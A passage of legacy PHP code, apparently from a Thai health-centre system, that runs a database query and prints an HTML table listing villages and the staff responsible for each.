house.villcode AND village.pcucode = house.pcucode\nInner Join ctitle ON `user`.prename = ctitle.titlecode\ngroup by address\norder by villno\n"; $result = mysql_query($sql); $txt = ''; $txt .= "<p align='center'><br><b><center>แสดงรายชื่อเจ้าหน้าที่และหมู่บ้านรับผิดชอบ</b></p></center>"; $txt .= "<center><table class='table table-striped table-hover table-bordered'>\n <tr>\n <th width='8%' scope='col'>ลำดับ</th>\n <th width='25%' scope='col'>ชื่อหมู่บ้าน</th>\n <th width='25%' scope='col'>เจ้าหน้าที่ผู้รับผิดชอบ</th>\n <th width='15%' scope='col'>หมายเหตุ</th>\n </tr>"; while ($row = mysql_fetch_array($result)) { ++$i; if ($i % 2 == 1) { $cr = " class='altrow'"; } else { $cr = ""; } $txt .= " <tr {$cr}>\n <td><div align='center'>{$i}</div></td>\n <td> {$row['address']}</td>\n <td> {$row['pname']}</td>\n <td> </td>\n </tr>"; } $txt .= "</table></center>"; echo $txt; } elseif ($_GET[chk] == 0) {